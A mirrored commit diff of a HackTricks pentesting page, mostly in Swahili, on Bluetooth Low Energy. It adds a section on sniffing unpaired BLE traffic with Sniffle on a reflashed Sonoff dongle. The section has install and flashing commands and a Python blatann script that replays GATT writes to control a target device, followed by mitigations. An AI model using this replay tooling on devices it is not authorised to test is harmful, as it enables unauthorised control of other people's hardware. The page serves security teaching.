maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/todo/radio-hacking/pentesting-ble-bluetooth-low-ene

Browse Source
This commit is contained in:
Translator 2025-08-28 14:38:44 +00:00
parent ddaec77e19
commit 4f972a6871
1 changed files with 130 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

139
src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
View File

@ -2,23 +2,23 @@
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
## Introduction ## Utangulizi
Inapatikana tangu spesifikasiyo ya Bluetooth 4.0, BLE inatumia tu vituo 40, ikifunika anuwai ya 2400 hadi 2483.5 MHz. Kinyume chake, Bluetooth ya jadi inatumia vituo 79 katika anuwai hiyo hiyo. Iliyopatikana tangu muundo wa Bluetooth 4.0, BLE hutumia chaneli 40 tu, zikiwafunika anuwai ya 2400 hadi 2483.5 MHz. Kwa kulinganisha, Bluetooth ya jadi hutumia chaneli 79 katika anuwai ile ile.
Vifaa vya BLE vinawasiliana kwa kutuma **advertising packets** (**beacons**), hizi pakiti zinatangaza uwepo wa kifaa cha BLE kwa vifaa vingine vya karibu. Beacons hizi wakati mwingine **zinasambaza data** pia. Vifaa vya BLE huwasiliana kwa kutuma **paketi za matangazo** (**beacons**), paketi hizi hutangaza uwepo wa kifaa cha BLE kwa vifaa vingine vilivyokaribu. Beacons hizi wakati mwingine pia **hutuma data**.
Kifaa kinachosikiliza, pia kinachoitwa kifaa cha kati, kinaweza kujibu pakiti ya matangazo kwa **SCAN request** iliyotumwa mahsusi kwa kifaa kinachotangaza. **Jibu** kwa skani hiyo linatumia muundo sawa na pakiti ya **advertising** pamoja na taarifa za ziada ambazo hazikuweza kufanywa kwenye ombi la matangazo la awali, kama vile jina kamili la kifaa. Kifaa kinachosikiliza, kinachoitwa pia kifaa cha kati, kinaweza kujibu paketi ya matangazo kwa **SCAN request** iliyotumwa maalum kwa kifaa kinachoatangaza. **Response** ya skani hiyo inatumia muundo ule ule wa paketi ya **advertising** pamoja na taarifa za ziada ambazo hazikuweza kuingia kwenye ombi la matangazo la awali, kama jina kamili la kifaa.
![](<../../images/image (152).png>) ![](<../../images/image (152).png>)
Byte ya preamble inasawazisha masafa, wakati anwani ya ufikiaji ya byte nne ni **identifier ya muunganisho**, ambayo inatumika katika hali ambapo vifaa vingi vinajaribu kuanzisha muunganisho kwenye vituo sawa. Kisha, Kitengo cha Data ya Protokali (**PDU**) kina **data za matangazo**. Kuna aina kadhaa za PDU; zile zinazotumika sana ni ADV_NONCONN_IND na ADV_IND. Vifaa vinatumia aina ya PDU ya **ADV_NONCONN_IND** ikiwa **havikubali muunganisho**, vinatoa data tu katika pakiti ya matangazo. Vifaa vinatumia **ADV_IND** ikiwa **vinakubali muunganisho** na **vinaacha kutuma matangazo** mara tu **muunganisho** umepatikana. Byte ya preamble inalinganisha mzunguko wa frequency, wakati anwani ya upatikanaji ya bytes nne ni **kitambulisho cha connection**, ambacho kinatumika katika matukio ambapo vifaa vingi vinajaribu kuanzisha connections kwenye chaneli zile zile. Ifuatayo, Protocol Data Unit (**PDU**) ina **data ya matangazo**. Kuna aina kadhaa za PDU; zilizotumika sana ni ADV_NONCONN_IND na ADV_IND. Vifaa vinatumia aina ya PDU **ADV_NONCONN_IND** ikiwa havukubali connections, vikituma data tu kwenye paketi ya matangazo. Vifaa vinatumia **ADV_IND** ikiwa vinaruhusu connections na **kuacha kutuma paketi za matangazo** mara tu **connection** itakapokuwa **imeanzishwa**.
### GATT ### GATT
**Profaili ya Sifa ya Kijeni** (GATT) inaelezea jinsi **kifaa kinapaswa kuunda na kuhamasisha data**. Unapokuwa unachambua uso wa shambulio la kifaa cha BLE, mara nyingi utaelekeza umakini wako kwenye GATT (au GATTs), kwa sababu ndivyo **ufanyaji kazi wa kifaa unavyoanzishwa** na jinsi data inavyohifadhiwa, kuunganishwa, na kubadilishwa. GATT inataja sifa, maelezo, na huduma za kifaa katika jedwali kama thamani za 16- au 32-bits. **Sifa** ni thamani ya **data** inayotumwa kati ya kifaa cha kati na cha pembeni. Sifa hizi zinaweza kuwa na **maelezo** ambayo **yanatoa taarifa za ziada kuhusu hizo**. **Sifa** mara nyingi **zinaunganishwa** katika **huduma** ikiwa zinahusiana na kutekeleza hatua maalum. The **Generic Attribute Profile** (GATT) inafafanua jinsi **kifaa kinavyopaswa kuunda muundo na kuhamisha data**. Unapokuwa unachambua uso wa shambulio wa kifaa cha BLE, mara nyingi utaelekeza umakini wako kwenye GATT (au GATTs), kwa sababu ndicho jinsi **utendaji wa kifaa unavyochochewa** na jinsi data inavyohifadhiwa, kuunganishwa, na kubadilishwa. GATT inaorodhesha sifa (characteristics), descriptors, na services za kifaa kwenye jedwali kama thamani za 16- au 32-bits. Sifa (**characteristic**) ni thamani ya **data** inayo **tumwa** kati ya kifaa cha kati na peripheral. Sifa hizi zinaweza kuwa na **descriptors** zinazotoa **taarifa za ziada juu yao**. **Characteristics** mara nyingi **huwekwa pamoja** katika **services** ikiwa zinahusiana na kutekeleza kitendo fulani.
## Enumeration ## Uorodheshaji
```bash ```bash
hciconfig #Check config, check if UP or DOWN hciconfig #Check config, check if UP or DOWN
# If DOWN try: # If DOWN try:
@ -30,8 +30,8 @@ spooftooph -i hci0 -a 11:22:33:44:55:66
``` ```
### GATTool ### GATTool
**GATTool** inaruhusu **kuanzisha** **muunganisho** na kifaa kingine, kuorodhesha **sifa** za kifaa hicho, na kusoma na kuandika sifa zake.\ **GATTool** inaruhusu **kuanzisha** **muunganisho** na kifaa kingine, ikiorodhesha **characteristics** za kifaa hicho, na kusoma na kuandika **attributes** zake.\
GATTTool inaweza kuzindua shell ya mwingiliano kwa chaguo la `-I`: GATTTool inaweza kuanzisha shell ya mwingiliano kwa chaguo la `-I`:
```bash ```bash
gatttool -i hci0 -I gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful [ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
@ -64,4 +64,125 @@ sudo bettercap --eval "ble.recon on"
>> ble.write <MAC ADDR> <UUID> <HEX DATA> >> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06 >> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
``` ```
## Sniffing na kudhibiti moja kwa moja vifaa vya BLE visivyo na pairing
Vifaa vingi vya BLE vya bei nafuu havutekelezi pairing/bonding. Bila bonding, Link Layer encryption haiwezwi kamwe, hivyo ATT/GATT traffic iko kwa cleartext. Off-path sniffer inaweza kufuatilia connection, decode GATT operations ili kupata characteristic handles na values, na host yeyote uliye karibu anaweza kisha kuungana na ku-replay hizo writes ili kudhibiti kifaa.
### Sniffing na Sniffle (CC26x2/CC1352)
Hardware: Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) iliyoflashwa tena na NCC Groups Sniffle firmware.
Sakinisha Sniffle na Wireshark extcap yake kwenye Linux:
```bash
if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
echo "[+] - Sniffle not installed! Installing at 1.10.0..."
sudo mkdir -p /opt/sniffle
sudo chown -R $USER:$USER /opt/sniffle
pushd /opt/sniffle
wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
tar xvf v1.10.0.tar.gz
# Install Wireshark extcap for user and root only
mkdir -p $HOME/.local/lib/wireshark/extcap
ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
sudo mkdir -p /root/.local/lib/wireshark/extcap
sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
popd
else
echo "[+] - Sniffle already installed at 1.10.0"
fi
```
Flash Sonoff na firmware ya Sniffle (hakikisha kifaa chako cha serial kinalingana, kwa mfano /dev/ttyUSB0):
```bash
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd
```
Chukua katika Wireshark kupitia Sniffle extcap na quickly pivot to state-changing writes kwa kuchuja:
```text
_ws.col.info contains "Sent Write Command"
```
Hii inaonyesha ATT Write Commands kutoka kwa client; handle na value mara nyingi zinafananishwa moja kwa moja na vitendo vya kifaa (kwa mfano, andika 0x01 kwenye buzzer/alert characteristic, 0x00 kuacha).
Sniffle CLI mifano ya haraka:
```bash
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap
```
Alternative sniffer: Nordics nRF Sniffer for BLE + Wireshark plugin pia hufanya kazi. Kwa dongle ndogo/bei nafuu za Nordic mara nyingi unaandika juu bootloader ya USB ili kupakia firmware ya sniffer, hivyo au unahifadhi dongle maalum ya sniffer au unahitaji J-Link/JTAG kurejesha bootloader baadaye.
### Udhibiti hai kupitia GATT
Mara tu utakapobaini writable characteristic handle na value kutoka kwa trafiki iliyosniffwa, ungana kama central yoyote na fanya write ileile:
- With Nordic nRF Connect for Desktop (BLE app):
- Chagua dongle ya nRF52/nRF52840, scan na connect kwenye target.
- Vinjari GATT database, tafuta target characteristic (mara nyingi ina jina la kirafiki, e.g., Alert Level).
- Fanya Write na bytes zilizosniffwa (e.g., 01 to trigger, 00 to stop).
- Otomatisha kwenye Windows kwa dongle ya Nordic ukitumia Python + blatann:
```python
import time
import blatann
# CONFIG
COM_PORT = "COM29" # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00" # Replace with your target MAC
target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")
# CONNECT
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()
print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
print("[!] Connection failed.")
ble_device.close()
raise SystemExit(1)
print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)
# Example: write 0x01/0x00 to a known handle
for service in peer.database.services:
for ch in service.characteristics:
if ch.handle == 0x000b: # Replace with your handle
print("[!] Beeping.")
ch.write(b"\x01")
time.sleep(2)
print("[+] And relax.")
ch.write(b"\x00")
print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
```
### Vidokezo vya uendeshaji na hatua za kupunguza
- Tumia Sonoff+Sniffle kwenye Linux kwa channel hopping na connection following imara. Weka Nordic sniffer mbadala kama backup.
- Bila pairing/bonding, attacker yeyote aliye karibu anaweza observe writes na replay/craft zao kwa unauthenticated writable characteristics.
- Hatua za kupunguza: lazimisha pairing/bonding na uweke encryption; weka ruhusa za characteristic ili ziwe zinahitaji authenticated writes; punguza unauthenticated writable characteristics kadiri iwezekanavyo; thibitisha GATT ACLs kwa kutumia Sniffle/nRF Connect.
## References
- [Start hacking Bluetooth Low Energy today! (part 2) Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/)
- [Sniffle A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle)
- [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle)
- [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p)
- [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE)
- [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop)
- [blatann Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}